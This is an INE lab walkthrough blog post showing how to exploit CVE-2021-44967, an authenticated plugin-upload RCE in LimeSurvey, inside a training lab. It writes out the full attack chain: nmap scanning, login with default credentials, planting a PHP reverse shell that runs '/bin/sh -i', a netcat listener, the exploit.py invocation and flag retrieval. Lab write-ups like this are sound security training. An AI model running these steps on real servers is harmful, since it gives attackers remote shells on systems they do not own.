Resources
    [CVE-2021-44967] LimeSurv ...
    30 November 22

    [CVE-2021-44967] LimeSurvey RCE

    Posted byINE
    facebooktwitterlinkedin
    news-featured

    In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    This exercise is to understand how to exploit the LimeSurvey application.

    Purpose: We are learning how to exploit the LimeSurvey application's vulnerable version using the Python script and a manual method.

    Technical difficulty: Beginner

    Introduction

    As noted on the project's GitHub page:

    Limesurvey is the number one open-source survey software.

    Advanced features like branching and multiple question types make it a valuable partner for survey-creation.

    In this lab, we will learn how to exploit the authenticated remote code execution vulnerability (CVE-2021-44967) in the LimeSurvey application by uploading a malicious plugin containing arbitrary PHP code.

    Lab Environment

    In this lab environment, the user is going to get access to a Kali GUI instance. A vulnerable instance of the LimeSurvey application is hosted on the target server. It can be accessed using the tools installed on Kali at http://demo.ine.local.

    Objective: Leverage the plugin upload functionality to obtain code execution on the target server and retrieve the flag.

    limesurvey-rce-cve-2021-44967-0.png

    Challenge Link: https://my.ine.com/CyberSecurity/courses/ebd09929/cyber-security-vulnerabilities-training-library/lab/93e5a35c-b570-454b-b19e-bab6f28b748a

    1.png

    User Information

    Use the following credentials to access LimeSurvey's admin panel:

    Username: admin

    Password: password

    Tools

    The best tools for this lab are:

    • cURL

    • Netcat

    • Nmap

    • Python

    • Zip

    • A web browser

    Step 1: Open the lab link to access the Kali GUI instance.

    limesurvey-rce-cve-2021-44967-1.png

    Step 2: Check open ports on the provided machine.

    Command:

    nmap -sS -sV demo.ine.local

    limesurvey-rce-cve-2021-44967-2.png

    The Apache web server is running on port 80 on the target server.

    Step 3: Check the web application server by the Apache server.

    Open the following URL in the web browser:

    URL: http://demo.ine.local

    limesurvey-rce-cve-2021-44967-3.png

    LimeSurvey web application is hosted on the target server.

    As noted on the project's GitHub page:

    Limesurvey is the number one open-source survey software.

    Advanced features like branching and multiple question types make it a valuable partner for survey-creation.

    Open the /admin page:

    URL: http://demo.ine.local/admin

    limesurvey-rce-cve-2021-44967-3_1.png

    You should get the login page.

    Login using the provided credentials:

    Username: admin

    Password: password

    limesurvey-rce-cve-2021-44967-3_2.png

    We were successfully able to log in:

    limesurvey-rce-cve-2021-44967-3_3.png

    Step 4: Explore the plugins page.

    Click on Configuration -> Plugins:

    limesurvey-rce-cve-2021-44967-4.png

    You should notice all the available plugins:

    limesurvey-rce-cve-2021-44967-4_1.png

    Click on Upload & install:

    limesurvey-rce-cve-2021-44967-4_2.png

    You can upload a Zip plugin file through the provided web application.

    Step 5: Search for CVE-2021-44967.

    Search Query:

    LimeSurvey CVE-2021-44967

    limesurvey-rce-cve-2021-44967-5.png

    Open the CVE Mitre link:

    URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44967

    limesurvey-rce-cve-2021-44967-5_1.png

    A Remote Code Execution (RCE) vulnerability exists in LimeSurvey 5.2.4 via the upload and install plugins function, which could let a remote malicious user upload an arbitrary PHP code file.

    Open the following link mentioned in the references:

    URL: https://github.com/Y1LD1R1M-1337/Limesurvey-RCE

    limesurvey-rce-cve-2021-44967-5_2.png

    This project is available in the Kali GUI instance, in the /root/Desktop/challenge-files directory:

    Commands:

    ls -al /root/Desktop/challenge-files/

    ls -al /root/Desktop/challenge-files/Limesurvey-RCE/

    limesurvey-rce-cve-2021-44967-5_3.png

    Step 6: Inspect and modify the provided exploit files.

    List the contents of the Y1LD1R1M.zip file:

    Commands:

    cd /root/Desktop/challenge-files/Limesurvey-RCE/

    ls

    unzip -t Y1LD1R1M.zip

    limesurvey-rce-cve-2021-44967-6.png

    Check the contents of the php-rev.php file:

    Command:

    cat php-rev.php

    limesurvey-rce-cve-2021-44967-6_1.png

    We have to change the lines highlighted in the above image; that is, we need to provide the IP and port of the attacker machine where the Netcat listener would be running.

    Also, notice the shell command that gets executed on the target machine:

    Shell Commands:

    uname -a; w; id; /bin/sh -i

    To place the IP address in the PHP reverse shell, we have to find the IP address of the attacker machine:

    Command:

    ip addr

    limesurvey-rce-cve-2021-44967-6_2.png

    The IP address of the attacker machine is 192.151.37.2.

    Place the IP address of the attacker machine (192.151.37.2) and the port (54321) in the PHP reverse shell.

    Command:

    head php-rev.php

    limesurvey-rce-cve-2021-44967-6_3.png

    Find the CHANGE THIS words in the exploit.py file:

    Command:

    grep -n -C3 'CHANGE THIS' exploit.py

    limesurvey-rce-cve-2021-44967-6_4.png

    There are three potential places we have to make the change.

    Create the Y1LD1R1M.zip file again:

    Commands:

    rm Y1LD1R1M.zip

    zip -r Y1LD1R1M.zip config.xml php-rev.php

    unzip -t Y1LD1R1M.zip

    limesurvey-rce-cve-2021-44967-6_5.png

    Now we have the payload plugin (zip file) with a PHP reverse shell.

    Step 7: Upload the plugin zip file.

    Navigate to the web app and upload the plugin zip file (Y1LD1R1M.zip):

    limesurvey-rce-cve-2021-44967-7.png

    limesurvey-rce-cve-2021-44967-7_1.png

    limesurvey-rce-cve-2021-44967-7_2.png

    Confirm the uploaded plugin:

    limesurvey-rce-cve-2021-44967-7_3.png

    Click on the Install button:

    limesurvey-rce-cve-2021-44967-7_4.png

    The malicious plugin containing the PHP reverse shell was successfully installed.

    To use this plugin, it has to be activated. That would be done by the exploit script provided in the challenge files.

    Before proceeding with the exploitation, we need to find the plugin id. Locate the uploaded plugin:

    limesurvey-rce-cve-2021-44967-7_5.png

    limesurvey-rce-cve-2021-44967-7_6.png

    Hover over the plugin's entry:

    limesurvey-rce-cve-2021-44967-7_7.png

    Notice the link highlighted in the above image. It indicates the plugin id is 18.

    Now we have the path to the plugin zip file and the plugin id. Make those changes in the exploit.py file:

    Command:

    grep -n -C3 'CHANGE THIS' exploit.py

    limesurvey-rce-cve-2021-44967-7_8.png

    Check the usage of the exploit script:

    Command:

    python3 exploit.py

    limesurvey-rce-cve-2021-44967-7_9.png

    Start a Netcat listener in another terminal window:

    Command:

    nc -lvp 54321

    limesurvey-rce-cve-2021-44967-7_10.png

    Run the following command to exploit the target web app:

    Command:

    python3 exploit.py http://demo.ine.local admin password 80

    limesurvey-rce-cve-2021-44967-7_11.png

    limesurvey-rce-cve-2021-44967-7_12.png

    Exploitation was successful. Check the terminal where the Netcat listener was running:

    limesurvey-rce-cve-2021-44967-7_13.png

    We have received a shell session from the target server. The output of the following commands is shown in the Netcat window:

    • uname -a

    • w

    • id

    Step 8: Retrieve the flag from the target server.

    Now that we have the shell session on the target server, we can execute OS commands on the server.

    Listing the files present in the current working directory:

    Command:

    ls -al

    limesurvey-rce-cve-2021-44967-8.png

    Locating the flag file:

    Command:

    find / -iname *flag* 2>/dev/null

    limesurvey-rce-cve-2021-44967-8_1.png

    The flag is present in the /tmp/FLAG.txt file:

    Command:

    cat /tmp/FLAG.txt

    FLAG: 5cd43944938b4766026a8a77c08a28a7

    limesurvey-rce-cve-2021-44967-8_2.png

    With that, we conclude this lab, covering an authenticated remote code execution vulnerability in LimeSurvey. We could leverage CVE-2021-44967 by uploading a malicious plugin containing the reverse shell that provided us a reverse shell on the target server. Thus, we could perform a privilege escalation and access the underlying server starting with the admin access to the LimeSurvey web application!

    References

    Try this exploit for yourself! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    © 2024 INE. All Rights Reserved. All logos, trademarks and registered trademarks are the property of their respective owners.
    instagram Logofacebook Logotwitter Logolinkedin Logoyoutube Logo